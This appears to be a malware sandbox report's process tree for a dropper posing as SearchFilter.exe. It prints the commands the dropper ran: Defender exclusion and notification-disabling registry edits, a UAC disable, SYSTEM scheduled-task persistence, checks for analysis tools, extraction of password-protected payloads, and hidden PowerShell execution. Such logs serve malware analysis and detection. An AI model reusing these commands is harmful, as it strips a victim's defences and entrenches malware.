    "C:\Users\Admin\AppData\Local\Temp\SearchFilter.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\unknownTeams" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1900 --field-trial-handle=1908,i,8278312563499732900,11314668142889887827,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
    3⤵
    PID:1424
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "net session"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2780
  - - C:\Windows\SysWOW64\net.exe
      net session
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4116
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:4672
- - C:\Users\Admin\AppData\Local\Temp\SearchFilter.exe
    "C:\Users\Admin\AppData\Local\Temp\SearchFilter.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\unknownTeams" --mojo-platform-channel-handle=1844 --field-trial-handle=1908,i,8278312563499732900,11314668142889887827,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1240
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c " PowerShell -NoProfile -ExecutionPolicy Bypass -Command " try { $defenderExclusions = Get-MpPreference if ($defenderExclusions -eq $null) { throw 'Get-MpPreference failed to load preferences.' } if ($defenderExclusions.ExclusionPath -eq $null) { $defenderExclusions.ExclusionPath = @() } $defenderExclusions.ExclusionPath += 'C:\' Set-MpPreference -ExclusionPath $defenderExclusions.ExclusionPath } catch { Write-Error $_ exit 1 }""
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2396
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "reg.exe ADD "HKCU\Software\Policies\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:840
  - - C:\Windows\SysWOW64\reg.exe
      reg.exe ADD "HKCU\Software\Policies\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
      4⤵
      PID:3472
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Microsoft.WindowsDefender.SecurityCenter.Notifications" /v Enabled /t REG_DWORD /d 0 /f"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1176
  - - C:\Windows\SysWOW64\reg.exe
      reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Microsoft.WindowsDefender.SecurityCenter.Notifications" /v Enabled /t REG_DWORD /d 0 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:1480
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\WindowsDefenderSecurityCenter" /v Enabled /t REG_DWORD /d 0 /f"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4452
  - - C:\Windows\SysWOW64\reg.exe
      reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\WindowsDefenderSecurityCenter" /v Enabled /t REG_DWORD /d 0 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:3836
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v Enabled /t REG_DWORD /d 0 /f"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2408
  - - C:\Windows\SysWOW64\reg.exe
      reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v Enabled /t REG_DWORD /d 0 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:4888
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v ToastEnabled /t REG_DWORD /d 0 /f"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3892
  - - C:\Windows\SysWOW64\reg.exe
      reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v ToastEnabled /t REG_DWORD /d 0 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:4468
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "reg.exe ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v DisableNotifications /t REG_DWORD /d 1 /f"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2072
  - - C:\Windows\SysWOW64\reg.exe
      reg.exe ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v DisableNotifications /t REG_DWORD /d 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2164
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "reg.exe ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v DisableNotifications /t REG_DWORD /d 1 /f"
    3⤵
    PID:4164
  - - C:\Windows\SysWOW64\reg.exe
      reg.exe ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v DisableNotifications /t REG_DWORD /d 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:1196
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "reg.exe ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\PublicProfile" /v DisableNotifications /t REG_DWORD /d 1 /f"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1692
  - - C:\Windows\SysWOW64\reg.exe
      reg.exe ADD "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\PublicProfile" /v DisableNotifications /t REG_DWORD /d 1 /f
      4⤵
      PID:2908
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Notifications" /v SCNotifyEnabled /t REG_DWORD /d 0 /f"
    3⤵
    PID:2524
  - - C:\Windows\SysWOW64\reg.exe
      reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Notifications" /v SCNotifyEnabled /t REG_DWORD /d 0 /f
      4⤵
      PID:4316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2784
  - - C:\Windows\SysWOW64\reg.exe
      reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      PID:4244
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "\Microsoft\Windows\Device Guide\RegisterDeviceSecurityAlert" /tr "powershell -ExecutionPolicy Bypass -File \"C:\Users\Admin\AppData\Local\Programs\Common\NUL\mbam.ps1\"" /sc once /st 00:00 /du 9999:59 /ri 58 /ru "SYSTEM" /RL HIGHEST /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2752
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn "\Microsoft\Windows\Device Guide\RegisterDeviceSecurityAlert" /tr "powershell -ExecutionPolicy Bypass -File \"C:\Users\Admin\AppData\Local\Programs\Common\NUL\mbam.ps1\"" /sc once /st 00:00 /du 9999:59 /ri 58 /ru "SYSTEM" /RL HIGHEST /F
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:464
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "\Microsoft\Windows\Device Guide\RegisterDevicePowerStateChange" /tr "C:\ProgramData\MicrosoftTool\current\Microsoft.exe" /sc once /st 00:00 /du 9999:59 /ri 60 /RL HIGHEST /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3612
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn "\Microsoft\Windows\Device Guide\RegisterDevicePowerStateChange" /tr "C:\ProgramData\MicrosoftTool\current\Microsoft.exe" /sc once /st 00:00 /du 9999:59 /ri 60 /RL HIGHEST /F
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4672
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq watcher.exe""
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3140
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq watcher.exe"
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:1652
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq mitmdump.exe""
    3⤵
    PID:4292
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq mitmdump.exe"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1828
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq mitmproxy.exe""
    3⤵
    PID:3908
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq mitmproxy.exe"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2408
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq mitmweb.exe""
    3⤵
    PID:4480
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq mitmweb.exe"
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:712
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq Insomnia.exe""
    3⤵
    PID:4932
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq Insomnia.exe"
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HTTP Toolkit.exe""
    3⤵
    PID:1196
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq HTTP Toolkit.exe"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4024
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq Charles.exe""
    3⤵
    PID:4604
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq Charles.exe"
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2116
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq Postman.exe""
    3⤵
    PID:4056
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq Postman.exe"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4980
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BurpSuiteCommunity.exe""
    3⤵
    PID:3048
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq BurpSuiteCommunity.exe"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3668
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq Fiddler Everywhere.exe""
    3⤵
    - System Location Discovery: System Language Discovery
    PID:464
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq Fiddler Everywhere.exe"
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:3280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq Fiddler.WebUi.exe""
    3⤵
    PID:4912
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq Fiddler.WebUi.exe"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3856
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HTTPDebuggerUI.exe""
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2992
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq HTTPDebuggerUI.exe"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1176
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HTTPDebuggerSvc.exe""
    3⤵
    PID:3408
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq HTTPDebuggerSvc.exe"
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:1632
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HTTPDebuggerPro.exe""
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3620
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq HTTPDebuggerPro.exe"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1828
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq Progress Telerik Fiddler Web Debugger.exe""
    3⤵
    PID:212
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq Progress Telerik Fiddler Web Debugger.exe"
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:692
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HTTP Debugger Pro.exe""
    3⤵
    PID:3384
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq HTTP Debugger Pro.exe"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq Fiddler.exe""
    3⤵
    PID:3212
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq Fiddler.exe"
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:3884
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq FolderChangesView.exe""
    3⤵
    PID:4080
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq FolderChangesView.exe"
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4024
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq Wireshark.exe""
    3⤵
    PID:2468
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "IMAGENAME eq Wireshark.exe"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1112
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c ""C:\ProgramData\sevenZip\7z.exe" x "C:\Users\Admin\AppData\Local\Temp\tcp7st.7z" -pSaToshi780189.! -o"C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles" -y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:612
  - - C:\ProgramData\sevenZip\7z.exe
      "C:\ProgramData\sevenZip\7z.exe" x "C:\Users\Admin\AppData\Local\Temp\tcp7st.7z" -pSaToshi780189.! -o"C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles" -y
      4⤵
      Executes dropped EXE
      PID:2992
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\Folder\FM.ps1" -WindowStyle Hidden"
    3⤵
    - Hide Artifacts: Hidden Window
    - System Location Discovery: System Language Discovery
    PID:220
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileProgramFiles\Folder\FM.ps1" -WindowStyle Hidden
      4⤵
      Command and Scripting Interpreter: PowerShell
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      PID:3068
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c ""C:\ProgramData\sevenZip\7z.exe" x "C:\Users\Admin\AppData\Local\Microsoft\Vault\LOG.7z" -o"C:\Users\Admin\AppData\Local\Microsoft\Vault\LOG" -y"
    3⤵
    PID:2520
  - - C:\ProgramData\sevenZip\7z.exe
      "C:\ProgramData\sevenZip\7z.exe" x "C:\Users\Admin\AppData\Local\Microsoft\Vault\LOG.7z" -o"C:\Users\Admin\AppData\Local\Microsoft\Vault\LOG" -y
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "attrib +h +s "C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbchace_windows_api.dll""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    PID:3200
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbchace_windows_api.dll"
      4⤵
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:3036
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "schtasks /query /TN "Microsoft\Windows\Device Guide\RegisterDeviceNetworkChange" >nul 2>&1"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2936
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /query /TN "Microsoft\Windows\Device Guide\RegisterDeviceNetworkChange"
      4⤵
      PID:2044
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "nul" /tr "C:\Users\Admin\AppData\Local\Programs\Common\NUL\taskhostw\taskhostw.exe "C:\Users\Admin\AppData\Local\Programs\Common\NUL\taskhostw\taskhostw"" /st 00:08 /du 9999:59 /sc once /ri 5 /f"
    3⤵
    PID:4596
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn "nul" /tr "C:\Users\Admin\AppData\Local\Programs\Common\NUL\taskhostw\taskhostw.exe "C:\Users\Admin\AppData\Local\Programs\Common\NUL\taskhostw\taskhostw"" /st 00:08 /du 9999:59 /sc once /ri 5 /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4264
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "schtasks /run /tn "nul""
    3⤵
    PID:4992
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /run /tn "nul"
      4⤵
      PID:1512
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Start-Process -FilePath \"C:\Users\Admin\AppData\Local\Microsoft\Vault\LOG\RuntimeBroker\Runtime Broker.exe\"""
    3⤵
    PID:1576
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Start-Process -FilePath \"C:\Users\Admin\AppData\Local\Microsoft\Vault\LOG\RuntimeBroker\Runtime Broker.exe\""
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1028
    - - C:\Users\Admin\AppData\Local\Microsoft\Vault\LOG\RuntimeBroker\Runtime Broker.exe
        
        "C:\Users\Admin\AppData\Local\Microsoft\Vault\LOG\RuntimeBroker\Runtime Broker.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:4080
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "chcp"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2908
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp
        7⤵
        
        PID:4292
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
        6⤵
        
        PID:2748
        
        C:\Windows\SysWOW64\curl.exe
        
        curl http://api.ipify.org/ --ssl-no-revoke
        7⤵
        
        PID:3684
      - C:\Users\Admin\AppData\Local\Microsoft\Vault\LOG\RuntimeBroker\Runtime Broker.exe
        
        "C:\Users\Admin\AppData\Local\Microsoft\Vault\LOG\RuntimeBroker\Runtime Broker.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\nvfjaiohejwpumkl" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1928 --field-trial-handle=1932,i,7400838507105986312,5753517841005533922,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:3544
      - C:\Users\Admin\AppData\Local\Microsoft\Vault\LOG\RuntimeBroker\Runtime Broker.exe
        
        "C:\Users\Admin\AppData\Local\Microsoft\Vault\LOG\RuntimeBroker\Runtime Broker.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\nvfjaiohejwpumkl" --mojo-platform-channel-handle=2152 --field-trial-handle=1932,i,7400838507105986312,5753517841005533922,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:208
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
        6⤵
        
        PID:1696
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic bios get smbiosbiosversion
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:376
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
        6⤵
        
        PID:4480
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic MemoryChip get /format:list
        7⤵
        
        PID:4656
        
        C:\Windows\SysWOW64\find.exe
        
        find /i "Speed"
        7⤵
        
        PID:1316
      - C:\Users\Admin\AppData\Local\Microsoft\Vault\LOG\RuntimeBroker\Runtime Broker.exe
        
        "C:\Users\Admin\AppData\Local\Microsoft\Vault\LOG\RuntimeBroker\Runtime Broker.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\nvfjaiohejwpumkl" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1716 --field-trial-handle=1932,i,7400838507105986312,5753517841005533922,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:4868
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c ""C:\ProgramData\sevenZip\7z.exe" x "C:\ProgramData\80556c57-0819-4ad3-bb96-49ef3abd6c86.7z" -psomaliMUSTAFA681!!... -o"C:\ProgramData\MicrosoftTool" -y"
    3⤵
    PID:1016
  - - C:\ProgramData\sevenZip\7z.exe
      "C:\ProgramData\sevenZip\7z.exe" x "C:\ProgramData\80556c57-0819-4ad3-bb96-49ef3abd6c86.7z" -psomaliMUSTAFA681!!... -o"C:\ProgramData\MicrosoftTool" -y
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\script0913.ps1""
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1532
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\script0913.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "schtasks /query /tn \Microsoft\Windows\Device Guide\RegisterDevicePowerStateChange"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4856
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /query /tn \Microsoft\Windows\Device Guide\RegisterDevicePowerStateChange
      4⤵
      PID:2640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "start C:\ProgramData\MicrosoftTool\current\Microsoft.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:864
  - - C:\ProgramData\MicrosoftTool\current\Microsoft.exe
      C:\ProgramData\MicrosoftTool\current\Microsoft.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Modifies system certificate store
      PID:4468
    - - C:\ProgramData\MicrosoftTool\current\Microsoft.exe
        
        "C:\ProgramData\MicrosoftTool\current\Microsoft.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\Teams" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1616 --field-trial-handle=1772,i,16794135803700159794,13489102324403345985,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4956
    - - C:\ProgramData\MicrosoftTool\current\Microsoft.exe
        
        "C:\ProgramData\MicrosoftTool\current\Microsoft.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\Teams" --mojo-platform-channel-handle=2136 --field-trial-handle=1772,i,16794135803700159794,13489102324403345985,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4812
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "net session"
        5⤵
        
        PID:3024
      - C:\Windows\system32\net.exe
        
        net session
        6⤵
        
        PID:1056
        
